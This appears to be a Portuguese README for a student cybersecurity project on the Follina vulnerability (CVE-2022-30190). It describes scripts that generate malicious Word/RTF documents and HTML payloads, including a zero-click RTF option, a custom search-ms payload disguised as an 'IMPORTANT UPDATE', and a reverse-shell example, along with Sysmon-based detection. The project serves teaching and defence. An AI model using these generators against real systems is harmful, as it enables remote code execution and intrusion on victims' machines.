
Um projeto de Cibersegurança da Fullstack Academy que examina o ciclo completo da vulnerabilidade Follina (CVE-2022-30190), desde o exploit até a detecção e defesa.
Um projeto de Cibersegurança da Fullstack Academy examinando o ciclo completo da vulnerabilidade Follina (CVE-2022-30190), desde a exploração até a detecção e defesa.
Team:
Este conjunto de ferramentas pressupõe que você tenha um host web ou possa iniciar um servidor web simples usando Python para hospedar os arquivos de payload gerados ou de exemplo.
Os arquivos na pasta Example Payloads contêm código malicioso real. Eles foram usados com VMs em uma rede local e não devem representar um problema em uma rede segura onde você confia em todas as máquinas, mas tome cuidado ao usar ou modificar esses arquivos. Além disso, os geradores de documentos e payloads obviamente criam seus próprios arquivos maliciosos. Use estas ferramentas apenas em VMs ou outros ambientes descartáveis! Não use nenhuma ferramenta aqui que você não entenda.
Para criar o documento do Microsoft Word com o exploit Follina, execute o docgen_v3.py, usando as seguintes opções
--extention/-e : altera a saída do documento de .doc (padrão) para rtf para um ataque de zero clique. -e rtf--ip_address/-ip : altera o endereço IP que o documento tentará contatar (padrão é 10.0.2.15).--port/-p : altera a porta que tentará contatar (padrão é 8000)Para criar um arquivo html de payload, use generate_payload.py com o subcomando poc para gerar um payload de prova de conceito que abre a Calculadora do Windows ou o subcomando custom para gerar um payload com seu próprio script.
Exemplos:
python generate_payload.py poc -o test.html gerará o payload da calculadora em test.htmlpython generate_payload.py custom -o test.html -p "search-ms:query=procmon.exe&crumb=location:%5C%5Clive.sysinternals.com%5Ctools&displayname=IMPORTANT%20UPDATE" gerará test.html como um payload personalizado com o exploit SearchNightmareExemplos de payloads podem ser encontrados na pasta "Example Payloads".
A detecção de Follina requer que o Sysmon esteja instalado para registrar eventos. Nossos métodos de detecção aqui dependem de encontrar instâncias onde o Microsoft Word chama o MSDT.exe, mas os scripts podem ser modificados para buscar outros artefatos, como os argumentos usados pelo Follina em seu comando Powershell. As seguintes ferramentas estão disponíveis:
Todos os arquivos docx, rtf e html de exemplo estão apontados para payloads hospedados no endereço IP 10.0.2.15. Além disso, se você quiser usar o exploit de shell reverso, configure um listener na porta 9999.